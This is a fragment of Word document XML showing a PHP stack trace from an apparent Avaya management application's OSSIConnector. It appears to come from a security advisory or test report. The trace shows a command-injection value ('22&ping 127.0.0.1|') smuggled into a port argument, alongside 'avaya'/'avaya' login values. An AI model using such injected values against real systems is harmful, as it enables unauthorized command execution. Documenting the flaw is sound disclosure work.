            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F6ABD2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D2A3DF4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="789788FD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686F3975" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '127.0.0.1:22&amp;ping 127.0.0.1|' =&gt; '4101:1607955351',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFC3EE9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2106185C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_dirty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E13F3E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1607955351,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3943DB61" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B43F85F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_proxyfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mvap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/web/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>templates_c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>proxyhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799C4713" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'm_port0' =&gt; '4101',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5F99C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_portRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '16',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9AC368" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_LAUNCH_THRESHOLD_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5547201B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_IDLE_THRESHOLD_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24A795E9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_PROXY_LAUNCH_DELAY_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2EC6EA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ABSOLUTE_MAX_PORTS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 16,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3991CC7C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_PROXYFILE_DELIMITER</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; ':',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295E83D8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F4C44C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1B4E62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689AD6F9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1735F257" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; '127.0.0.1',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9EABF4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      1 =&gt; '22&amp;ping 127.0.0.1|',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613779E5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      2 =&gt; true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="284C2042" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7E4432" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060AD8D5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  2 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692D0C5D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00403357"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OSSIConnector.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39FE4522" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 57,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AAEE97D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ConnectWithReply</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53405B37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OSSIConnector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F84204" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D098904" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>OSSIConnector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51DA3811" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BA5C74E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DBE116" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B56FC75" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_socket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631FEAD2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nErr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 111,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A805DB8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_strErr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Connection refused',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0998371C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_timeoutSeconds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F86E9CA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ossi_response_timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '10',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C3C232" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_lastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21FDF3DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_bManualLoginRequired</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26818795" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nRefCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523B233D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_bTiming</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C3B945" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nMaxPorts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA76B4E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCC3DA5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F65A028" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BE07BB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3B6BAD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9E7E0E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A568705" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Host' =&gt; 'localhost',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4486C3E7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Port' =&gt; '4101',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01163CC7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Login' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D265930" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Credentials' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5338576F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Writable' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337F3031" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31688CBC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      1 =&gt; 'Connection refused',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12EBE656" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF02324" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D811B3B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  3 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CFE89B7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF5FECF"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OSSIModel.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773D100E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 218,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C9DE683" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; 'Connect',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A1327D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OSSIConnector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531ACBD6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460AB632" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>OSSIConnector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
